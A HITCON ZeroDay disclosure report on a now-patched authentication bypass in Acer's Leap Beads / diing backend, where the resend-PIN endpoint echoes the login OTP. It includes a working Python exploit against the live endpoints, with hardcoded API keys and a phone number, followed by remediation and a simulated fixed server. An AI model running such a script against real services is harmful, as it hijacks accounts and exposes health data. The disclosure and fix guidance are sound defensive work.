Acer Leap Beads / diing server side authentication bypass - HITCON ZeroDay

Vulnerability Detail Report

Vulnerability Overview

  • ZDID: ZD-2025-00445
  • Vendor: Acer Inc. (宏碁股份有限公司)
  • Title: Acer Leap Beads / diing server side authentication bypass
  • Introduction: during verification the MFA OTP is written directly into the response body

Handling Status

Current status: Public
Last Update : 2025/08/20
Stages: New submission → Reviewed → Reported to vendor → Patched → Re-tested → Public

Handling History

  • 2025/05/16 10:38:38 : New submission (status updated by asef18766)
  • 2025/05/22 12:28:55 : Review completed (status updated by HITCON ZeroDay service team)
  • 2025/06/11 17:56:15 : Review completed (status updated by HITCON ZeroDay service team)
  • 2025/06/11 17:56:15 : Patch in progress (status updated by HITCON ZeroDay service team)
  • 2025/07/07 16:48:54 : Re-test requested (status updated by HITCON ZeroDay service team)
  • 2025/07/08 02:06:23 : Patch confirmed (status updated by asef18766)
  • 2025/07/11 03:00:39 : Public (updated automatically by the HITCON ZeroDay platform)
  • 2025/08/20 17:20:13 : Public (status updated by HITCON ZeroDay service team)

Details

  • ZDID: ZD-2025-00445
  • Reporter: asef18766 (asef18766)
  • Risk: Medium
  • Type: Broken Access Control (存取控制缺陷)

References

An attacker can use this vulnerability to read, modify or delete other users' data in the system, or reach pages reserved for higher-privileged users.

OWASP Top 10 - 2017 A5 - Broken Access Control
https://www.owasp.org/index.php/Top_10-2017_A5-Broken_Access_Control

CWE-284: Improper Access Control
https://cwe.mitre.org/data/definitions/284.html
(This section is generated automatically by the platform from the vulnerability category and is provided as reference material.)

Related URLs

https://kamartaj-backend.diing.com/v1/resend_pin

Description

type

Auth bypass

Impact

Access arbitrary user data, accrue merit (bead counts) at will (?)

full exploit script

import requests
from datetime import datetime

# All endpoints take the app's static API credentials as query parameters.
# These values are the ones the reporter observed in the client; the OTP
# bypass does not depend on them being secret, only on /v1/resend_pin
# echoing the freshly generated PIN back to the caller.

def init_account(phone:str)->str:
    # Register a new account for the given phone number. The registration
    # response already contains the verification PIN.
    with requests.post("https://kamartaj-backend.diing.com/v1/users", params={
        "secret_access_key": "w9rSAxcwBfZaPHyZUgkL",
        "access_key_id": "Z6jED698Vo4ovsZo",
        "phone": phone,
        "platform": "android",
        "source_from": "phone",
        "email":"",
        "deviceid": "3722b7b1-6a79-484e-8beb-ed3004b96541",
        "locale": "en",
    }) as resp:
        print(resp.status_code)
        return resp.json()["pin"]

def get_pin(phone:str)->str:
    # The vulnerable endpoint: asking for a PIN "resend" for any phone number
    # returns that PIN in the JSON body instead of only delivering it by SMS.
    with requests.post("https://kamartaj-backend.diing.com/v1/resend_pin", params={
        "secret_access_key": "w9rSAxcwBfZaPHyZUgkL",
        "access_key_id": "Z6jED698Vo4ovsZo",
        "phone":phone,
        "email":"",
        "type":"phone"
    }) as resp:
        print(resp.json())
        return resp.json()["pin"]

def login(phone:str, pin:str)->str:
    # Exchange the leaked PIN for the victim's auth_token.
    # Note: the original script sends the phone number itself as "type"
    # (resend_pin uses "phone"); kept as the reporter ran it.
    with requests.post("https://kamartaj-backend.diing.com/v1/login", params={
        "secret_access_key": "w9rSAxcwBfZaPHyZUgkL",
        "access_key_id": "Z6jED698Vo4ovsZo",
        "phone": phone,
        "pin": pin,
        "platform": "android",
        "type": phone,
        "email": "",
        "deviceid": "3722b7b1-6a79-484e-8beb-ed3004b96541"
    }) as resp:
        return resp.json()["auth_token"]

def get_basic_info(token:str)->dict:
    with requests.get(f"https://kamartaj-backend.diing.com/v1/users/me?auth_token={token}") as resp:
        return resp.json()

def update_user(token:str, username:str, birthday=datetime.now(), gender="apache", height=187.0, weight=87.0, bio="")->dict:
    # Overwrite the victim's profile, including the avatar (multipart upload).
    with open("test.png", "rb") as avatar, requests.post("https://kamartaj-backend.diing.com/v1/users/me",
        data={
            "auth_token":token,
            "name":username,
            "gender":gender,
            "birthday":birthday.strftime("%Y/%m/%d"),
            "height":str(height),
            "weight":str(weight),
            "bio":bio,
            "locale":"en",
        },
        files={
            "avatar":("cachecrop.png", avatar, "image/png"),
        }
    ) as resp:
        print(resp.status_code)
        return resp.json()

def get_health_record(
    auth_token:str, 
):
    # Dump the victim's health records (steps, sleep, bead counts).
    with requests.get("https://kamartaj-backend.diing.com/v1/health_records", params={
        "auth_token":auth_token,
        "per_page":999,
        "page":1,
        "order":"desc"
    }) as resp:
        return resp.json()

def update_health_record(
    auth_token:str, 
    date:datetime, 
    step_counts=1, 
    distance_meters=1, 
    calory_kcal=1, 
    activity_minutes=1, 
    light_sleep_minutes=1,
    deep_sleep_minutes=1,
    wake_minutes=1,
    total_sleep_minutes=1,
    bead_counts=87
):
    # Write an arbitrary daily record under the victim's account
    # (this is the "accrue merit at will" part of the impact).
    with requests.post(f"https://kamartaj-backend.diing.com/v1/health_records/{date.strftime('%Y-%m-%d')}", data={
        "auth_token":auth_token,
        "step_counts":step_counts,
        "distance_meters":distance_meters,
        "calory_kcal":calory_kcal,
        "activity_minutes":activity_minutes,
        "light_sleep_minutes":light_sleep_minutes,
        "deep_sleep_minutes":deep_sleep_minutes,
        "wake_minutes":wake_minutes,
        "total_sleep_minutes":total_sleep_minutes,
        "bead_counts":bead_counts
    }) as resp:
        print(resp.status_code)
        return resp.json()

if __name__ == "__main__":
    from pprint import pprint
    phone = "886277496696"
    #pin = (init_account(phone))

    # Only the target's phone number is needed: the server hands back the OTP.
    pin = get_pin(phone)
    print(pin)
    token = login(phone, pin)

    #print(get_basic_info(token))
    #pprint(get_health_record(token))
    #print(update_health_record(token, datetime.now()))
    #print(update_user(token, "6666"))

Remediation

Remove the PIN from the response. The OTP must only ever leave the server over the out-of-band channel (SMS to the registered number); the HTTP response to /v1/resend_pin should be a generic acknowledgement that is identical whether or not the number is registered. While there, store only a hash of the PIN, give it a short expiry, cap the number of verification attempts, and invalidate it after one successful use so that the endpoint cannot be turned into an online guessing oracle once the echo is gone.
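The following is an added example, not diing's or Acer's code, showing the reported behaviour beside a fixed OTP flow in a hypothetical server-side handler. The endpoint names (resend_pin, login) follow the report; the HMAC-based PIN storage, the expiry and attempt limits, the in-memory store and the SMS outbox stand-in are assumptions chosen to make the example run offline. The `response_leaks_otp` check is the regression test a fix for this class of bug should keep around.

```python
"""Hypothetical OTP login flow: the reported bug beside a fixed version.
Added example; not diing's or Acer's code. Storage, secret, limits and the
SMS stand-in are assumptions."""
import hashlib
import hmac
import secrets
import time
from dataclasses import dataclass
from typing import Callable, Dict, List, Optional, Tuple

OTP_TTL_SECONDS = 300   # assumed lifetime of a one-time PIN
MAX_ATTEMPTS = 5        # assumed cap on wrong guesses per issued PIN


@dataclass
class PendingOtp:
    digest: bytes        # HMAC of the PIN; the PIN itself is never stored
    expires_at: float
    attempts: int = 0


class OtpService:
    def __init__(self, server_secret: bytes,
                 now: Callable[[], float] = time.time,
                 pin_source: Optional[Callable[[], str]] = None):
        self._secret = server_secret
        self._now = now
        self._pin_source = pin_source or (lambda: f"{secrets.randbelow(10**6):06d}")
        self._pending: Dict[str, PendingOtp] = {}
        # Constructed stand-in for the SMS gateway: (phone, pin) pairs "delivered".
        self.sms_outbox: List[Tuple[str, str]] = []

    def _digest(self, phone: str, pin: str) -> bytes:
        return hmac.new(self._secret, f"{phone}:{pin}".encode(), hashlib.sha256).digest()

    def _issue(self, phone: str) -> str:
        pin = self._pin_source()
        self._pending[phone] = PendingOtp(self._digest(phone, pin),
                                          self._now() + OTP_TTL_SECONDS)
        self.sms_outbox.append((phone, pin))   # out-of-band delivery
        return pin

    def resend_pin_vulnerable(self, phone: str) -> dict:
        # The reported behaviour: the freshly generated OTP is echoed back to
        # whoever called the endpoint, so access to the phone is never needed.
        pin = self._issue(phone)
        return {"status": "ok", "pin": pin}

    def resend_pin_fixed(self, phone: str) -> dict:
        # Same generation and delivery; the response carries no secret and is
        # the same whether or not the number is registered.
        self._issue(phone)
        return {"status": "ok"}

    def login(self, phone: str, pin: str) -> Optional[dict]:
        entry = self._pending.get(phone)
        if entry is None:
            return None
        if self._now() > entry.expires_at or entry.attempts >= MAX_ATTEMPTS:
            self._pending.pop(phone, None)      # expired or exhausted: discard
            return None
        entry.attempts += 1
        if not hmac.compare_digest(entry.digest, self._digest(phone, pin)):
            return None
        self._pending.pop(phone, None)          # one-time use
        return {"auth_token": secrets.token_urlsafe(32)}


def response_leaks_otp(resp: dict, sms_outbox: List[Tuple[str, str]]) -> bool:
    """Regression check: any value in the response equals a PIN delivered out of band."""
    delivered = {pin for _, pin in sms_outbox}
    return any(str(v) in delivered for v in resp.values())


def attacker_flow(svc: OtpService, victim_phone: str, resend) -> Optional[dict]:
    """Reproduce the report: request a PIN for the victim's number, then log in
    with whatever PIN the response contains (or a fixed guess if there is none)."""
    resp = resend(victim_phone)
    guess = resp.get("pin", "000000")
    return svc.login(victim_phone, guess)


if __name__ == "__main__":
    victim = "886277496696"   # number from the report
    svc = OtpService(b"server-secret")
    print("vulnerable:", attacker_flow(svc, victim, svc.resend_pin_vulnerable))
    print("fixed:     ", attacker_flow(svc, victim, svc.resend_pin_fixed))
```

Against the vulnerable handler the attacker obtains a valid `auth_token` with nothing but the victim's phone number, exactly as the exploit script above does; against the fixed handler the same flow fails, the legitimate user who received the SMS still logs in, and a PIN cannot be replayed, guessed past `MAX_ATTEMPTS`, or used after `OTP_TTL_SECONDS`.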
